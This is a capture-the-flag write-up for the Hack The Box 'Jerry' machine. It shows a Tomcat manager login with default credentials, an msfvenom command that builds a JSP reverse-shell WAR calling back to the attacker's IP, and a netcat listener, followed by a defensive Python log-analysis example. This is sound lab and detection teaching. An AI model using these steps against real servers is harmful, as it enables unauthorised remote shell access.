Hack The Box Jerry Write-Up

Enumeration

Nmap

Nmap reveals that port 8080 is open. Let’s visit port 8080 in a web browser.

Apache Tomcat/7.0.88
Basic access authentication

To access the Tomcat manager we need a valid username and password. When we enter an invalid username and password, we get a 403 Access Denied message.

403 Access Denied

Let’s try the username: tomcat and password: s3cret

Once we successfully authenticate, we’re brought to the Tomcat Web Application Manager. The Tomcat manager has an option to upload .war files to the server.

Tomcat Web Application Manager

Exploitation

We can use msfvenom to generate a Java reverse-shell payload with a .war extension:

msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.6 LPORT=4444 -f war > cmd.war

Upload and deploy the reverse shell, then visit http://10.10.10.95:8080/cmd/

Let’s open a netcat listener to get the shell, which is generated after our cmd.war file gets executed.

The flag is located in:

C:\Users\Administrator\Desktop\flags

The user and root flags are both written in the "2 for the price of 1.txt" file, which can be read using the type command.

type "2 for the price of 1.txt"
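
Seen from the defender's side, the steps above leave a recognizable trail in Tomcat's access log: failed manager logins, a successful one, then a WAR upload through the manager. The following Python check is an added example, not part of the original write-up; it assumes Tomcat's default access-log pattern (%h %l %u %t "%r" %s %b), and the sample log lines, the threshold and the function name are constructed for illustration.

```python
import re
from collections import defaultdict

# Constructed sample lines in the default access-log pattern; timestamps,
# sizes and the nonce value are made up for this example.
SAMPLE_LOG = """\
10.10.14.6 - - [01/Jan/2024:10:00:01 +0000] "GET /manager/html HTTP/1.1" 401 2473
10.10.14.6 - - [01/Jan/2024:10:00:05 +0000] "GET /manager/html HTTP/1.1" 401 2473
10.10.14.6 - tomcat [01/Jan/2024:10:00:09 +0000] "GET /manager/html HTTP/1.1" 200 17432
10.10.14.6 - tomcat [01/Jan/2024:10:01:30 +0000] "POST /manager/html/upload?org.apache.catalina.filters.CSRF_NONCE=CONSTRUCTED HTTP/1.1" 200 19214
10.10.14.6 - - [01/Jan/2024:10:01:40 +0000] "GET /cmd/ HTTP/1.1" 200 0
192.168.1.20 - - [01/Jan/2024:10:02:00 +0000] "GET /docs/ HTTP/1.1" 200 19677
"""

LINE = re.compile(
    r'(?P<ip>\S+) \S+ (?P<user>\S+) \[[^\]]+\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

def find_manager_abuse(log_text, fail_threshold=2):
    """Return (finding, client_ip, user) tuples for suspicious manager activity."""
    failures = defaultdict(int)   # failed manager logins per client IP
    findings = []
    for line in log_text.splitlines():
        m = LINE.match(line)
        if not m:
            continue                      # skip lines in another format
        ip, user, status = m["ip"], m["user"], m["status"]
        path = m["path"].split("?")[0]    # ignore the query string
        if not path.startswith("/manager/"):
            continue
        if status in ("401", "403"):
            failures[ip] += 1
        elif status == "200" and user != "-" and failures[ip] >= fail_threshold:
            # An authenticated request right after repeated failures
            findings.append(("login-after-failures", ip, user))
            failures[ip] = 0
        if m["method"] == "POST" and path == "/manager/html/upload" and status == "200":
            # A WAR file was uploaded through the HTML manager
            findings.append(("war-upload", ip, user))
    return findings

if __name__ == "__main__":
    for finding in find_manager_abuse(SAMPLE_LOG):
        print(finding)
```

A browser's first unauthenticated request always produces one 401, so the threshold should be tuned above that on a real server. Any war-upload finding from an address outside the administrators' network deserves review on its own.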

Akash c